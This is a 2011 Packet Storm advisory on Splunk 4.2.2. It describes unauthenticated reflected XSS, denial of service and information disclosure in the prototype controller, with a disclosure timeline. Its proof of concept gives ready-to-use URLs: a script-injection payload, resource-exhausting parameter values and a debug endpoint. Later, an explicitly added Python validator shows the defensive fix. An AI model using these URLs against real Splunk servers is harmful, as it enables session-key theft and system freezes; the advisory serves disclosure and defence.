Splunk Cross Site Scripting / Denial Of Service

2011-10-19T00:00:00
ID PACKETSTORM:105989
Type packetstorm
Reporter Filip Palian
Modified 2011-10-19T00:00:00

Description

-- Product description:
Splunk collects, indexes and harnesses the massive volumes of valuable  
machine data generated by your complex IT infrastructure, whether  
physical, virtual or in the cloud.  
  
-- Vulnerable product:  
The vulnerability was found and tested on splunk-4.2.2-101277-linux-2.6-x86_64.  
  
-- Problem Description:  
The script "splunk/lib/python2.6/site-packages/splunk/appserver/mrsparkle/controllers/prototype.py"
lacks user input validation, resulting in reflected XSS
(yes, I have them enough too) and denial of service (operating system
freeze). Some details are included below.
  
-- Requirements:  
No authentication in Splunk was required to successfully conduct the attacks.
  
-- Proof Of Concept:  
Reflected XSS:  
https://localhost/en-US/prototype/segmentation_performance?lines=2&depth=2&segment=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&element=aaa&attribute=aaa&segmentation=flattened  
  
DoS:  
https://localhost/en-US/prototype/segmentation_performance?lines=999&depth=99999999&segment=foo&element=span&attribute=class&segmentation=nested  
  
little bonus - Information disclosure:  
https://localhost/en-US/prototype/segmentation_performance?lines=99999999999999999999999999999999999999&depth=99999999999999999999999999999999999999&segment=foo&element=span&attribute=class&segmentation=nested  
https://localhost/en-US/debug/sso  
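As a defender-side illustration of the missing validation described above, here is a parameter check for the query string that the segmentation_performance handler receives. This is added code, not Splunk's own and not from the advisory; the numeric bounds, the allow-lists and the is_accepted helper are assumptions, since the advisory does not state what limits the vendor fix applies.

```python
import html
import re
from typing import Dict

# Illustrative limits; the advisory does not state what bounds Splunk's fix applies.
MAX_LINES = 1000
MAX_DEPTH = 50
ALLOWED_ELEMENTS = {"span", "div", "p"}
ALLOWED_SEGMENTATION = {"flattened", "nested"}
IDENT_RE = re.compile(r"[A-Za-z][A-Za-z0-9_-]{0,63}")

class BadRequest(ValueError):
    """Raised for any parameter that fails validation; the handler maps it to HTTP 400."""

def parse_bounded_int(raw: str, lo: int, hi: int, name: str) -> int:
    # Check the string's shape before int() sees it: a 38-digit value is rejected
    # here and never reaches the code that sizes the response.
    if not re.fullmatch(r"\d{1,6}", raw):
        raise BadRequest(f"{name}: expected a short decimal integer")
    value = int(raw)
    if not lo <= value <= hi:
        raise BadRequest(f"{name}: {value} outside [{lo}, {hi}]")
    return value

def validate_segmentation_params(params: Dict[str, str]) -> Dict[str, object]:
    """Return a cleaned parameter set for the handler, or raise BadRequest."""
    lines = parse_bounded_int(params.get("lines", ""), 1, MAX_LINES, "lines")
    depth = parse_bounded_int(params.get("depth", ""), 1, MAX_DEPTH, "depth")
    element = params.get("element", "")
    if element not in ALLOWED_ELEMENTS:
        raise BadRequest("element: not in allow-list")
    attribute = params.get("attribute", "")
    if not IDENT_RE.fullmatch(attribute):
        raise BadRequest("attribute: not a plain identifier")
    segmentation = params.get("segmentation", "")
    if segmentation not in ALLOWED_SEGMENTATION:
        raise BadRequest("segmentation: not in allow-list")
    # 'segment' is free text the page reflects back: escape it (quotes included) on output.
    segment = html.escape(params.get("segment", ""), quote=True)
    return {"lines": lines, "depth": depth, "segment": segment,
            "element": element, "attribute": attribute, "segmentation": segmentation}

def is_accepted(params: Dict[str, str]) -> bool:
    try:
        validate_segmentation_params(params)
        return True
    except BadRequest:
        return False
```

With these checks the reflected script in the first PoC URL is rendered as inert text, and the depth and lines values from the second and third URLs are rejected before any rendering loop is sized.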
  
-- Impact:  
Possible disclosure of a valid Splunk session key, exhaustion of all system
resources, and sensitive information disclosure.
  
-- Disclosure timeline:  
2011.08.25: detailed information about vulnerability and PoC sent to vendor  
2011.08.25: vendor response  
2011.10.19: vendor released official fixes  
2011.10.19: advisory released  
  
-- Greetz  
as always... goes to folks from #dragonfly  
  
  
Best regards,  
Filip Palian  